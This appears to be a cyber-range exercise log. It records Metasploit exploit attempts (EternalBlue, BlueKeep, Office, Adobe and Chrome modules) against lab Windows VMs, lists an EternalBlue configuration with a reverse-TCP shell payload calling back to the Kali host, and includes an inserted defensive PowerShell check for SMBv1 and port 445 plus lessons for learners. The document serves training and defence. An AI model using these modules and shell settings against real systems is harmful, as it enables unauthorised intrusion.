Setup Kali Linux VM + Metasploit
Kali Linux VM Download Link: https://www.kali.org/get-kali/
Guide on setting up Metasploit: https://www.kali.org/docs/tools/starting-metasploit-framework-in-kali/
Offensive Step Documentation
Attempt 1 BLOCKED: Tried running the /windows/fileformat/office_ms17_11882 module but was unsuccessful. Windows Defender identified the RTF file as a virus.
Attempt 2 FAILED: Tried running the windows/browser/chrome_filereader_uaf module but was unsuccessful. Stuck in a loop of sending:
Still unsuccessful even after disabling the sandbox. The likely reason it doesn't work is that it has been patched in later versions of Chrome.
Attempt 3 BLOCKED: Tried running the /windows/fileformat/adobe_geticon module but was unsuccessful. Similar to attempt 1, Windows Defender identified the PDF file as a virus.
*Quite a number of exploit modules in Metasploit are old, i.e. from many years back. These likely won't work because the vulnerabilities have been patched. Need to either find a recent one that works or try to download an older version of the particular application.
References:
Attempt 4: EternalBlue exploit FAILED
From our internal recon, we found that port 445 is open on the target machine. This port is needed for EternalBlue to work.
We can see that the target machine IS vulnerable to EternalBlue after running the scanner module in Metasploit.
Next, I ran the windows/smb/ms17_010_eternalblue module on the target machine. The module was unable to establish a meterpreter/shell session.
Config used:
RHOST = 10.10.10.218 (Target IP)
RPORT = 445
LHOST = 10.10.10.102 (Kali IP)
LPORT = 4444
Payload = windows/x64/shell/reverse_tcp
Reopened msfconsole and retried. WIN instead of FAIL, but still no command shell...
Tried interacting with the session but nothing happens... it seems the command shell opened and got closed immediately.
References:
https://null-byte.wonderhowto.com/how-to/exploit-eternalblue-windows-server-with-metasploit-0195413/
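The two preconditions the recon above relies on (TCP/445 reachable and the SMBv1 server protocol enabled) can be verified on the Windows host itself rather than trusted from a remote scanner. The following PowerShell script is an added example and is not part of the original notes or of Metasploit; it reports SMBv1 state and port 445 listeners and, only when run with `-Remediate`, disables SMBv1. It does not verify MS17-010 patch status beyond listing recent hotfixes for manual comparison. Run it as Administrator on the host under test (Win7 SP1 or Win10 as in the log); the registry key it reads on Win7 is the documented LanmanServer SMB1 switch.

```powershell
# Added example (not from the original notes): defender-side check of the
# EternalBlue (MS17-010) preconditions described in the log.
param([switch]$Remediate)

$LanmanKey = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'

function Get-Smb1State {
    # Windows 8 / Server 2012 and later expose the SMB server settings as a cmdlet.
    if (Get-Command Get-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        return [bool](Get-SmbServerConfiguration).EnableSMB1Protocol
    }
    # Windows 7 / Server 2008 R2: the SMB1 DWORD under LanmanServer\Parameters.
    # A missing value means SMBv1 is enabled (the default on those versions).
    $val = (Get-ItemProperty -Path $LanmanKey -Name SMB1 -ErrorAction SilentlyContinue).SMB1
    if ($null -eq $val) { return $true }
    return ($val -ne 0)
}

function Get-Port445Listeners {
    # Listening sockets on TCP/445, i.e. what a remote scan reports as "open".
    if (Get-Command Get-NetTCPConnection -ErrorAction SilentlyContinue) {
        return Get-NetTCPConnection -LocalPort 445 -State Listen -ErrorAction SilentlyContinue |
            Select-Object LocalAddress, LocalPort, OwningProcess
    }
    # Win7 fallback: parse netstat output.
    return netstat -ano | Select-String -Pattern ':445\s+\S+\s+LISTENING'
}

function Get-RecentHotfixes {
    # Most recently installed updates, for manual comparison with the MS17-010 bulletin.
    return Get-HotFix | Sort-Object InstalledOn -Descending | Select-Object -First 5 HotFixID, InstalledOn
}

$smb1 = Get-Smb1State
Write-Host "SMBv1 server enabled : $smb1"
Write-Host "TCP/445 listeners    :"
Get-Port445Listeners | Format-Table -AutoSize
Write-Host "Recent hotfixes      :"
Get-RecentHotfixes | Format-Table -AutoSize

if ($smb1 -and $Remediate) {
    if (Get-Command Set-SmbServerConfiguration -ErrorAction SilentlyContinue) {
        # Win8+/2012+: takes effect without reboot.
        Set-SmbServerConfiguration -EnableSMB1Protocol $false -Force
    } else {
        # Win7/2008 R2: reboot required for the registry change to apply.
        Set-ItemProperty -Path $LanmanKey -Name SMB1 -Type DWORD -Value 0 -Force
    }
    Write-Host "SMBv1 disabled; apply the MS17-010 update and restrict TCP/445 at the host firewall."
} elseif ($smb1) {
    Write-Host "SMBv1 is enabled; rerun with -Remediate to disable it."
}
```

Disabling SMBv1 removes the protocol EternalBlue targets but is not a substitute for the MS17-010 update; both belong on a host that exposes port 445 inside the range.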
Attempt 5: BlueKeep_RCE exploit FAILED
Attempt 6: EternalBlue exploit using payload generic/shell_reverse_tcp
Able to get a shell now, but entering a command causes it to close...
Attempt to upgrade the shell to meterpreter failed because the connection got reset...
Attempt 7: EternalBlue exploit using payload generic/shell_bind_tcp
No shell again...
Jym's Comments
Remove Kali from ZeroTier
Upgraded to Meterpreter...
Routing is the root cause of 's problems
So what happened: I added 2 routes for me to access the Cyber Range directly.
I needed to add Kali into ZT so that YJ can access it remotely, but due to the routing that I need, I created a problem for him, because when the Kali tries to send payloads again, they end up going to ZT.
I manually took the URL to the target to run... but it failed. This means something is wrong with networking...
Partial Access
NOT using reverse_tcp (generic/shell_bind_tcp, see below). I kill my session, you try again. Wait, I try to upgrade to Meterpreter... failed.
Installed a separate Win7 SP1 64-bit to test concurrently... same as the initial .218 experience, all FAIL...
Will add a shared folder to retest... looks like it still refuses to work for the new VM...
Points to experience for learner
- Realise exploit payloads from many of these popular offensive tools (e.g. Metasploit) are mostly NOT viable on Win10
- Compare this experience with your Type 2 Code-Execution attempt, and even Type 1 if there were NO app control with OpenEDR
- Why would any sane person make his/her life difficult when there are easier ways to execute code?
- You selected the exploits you did because you knew what was inside the VM; what if you don't know?
- Even when the EternalBlue scanner reported as "vulnerable", it may not be reliable.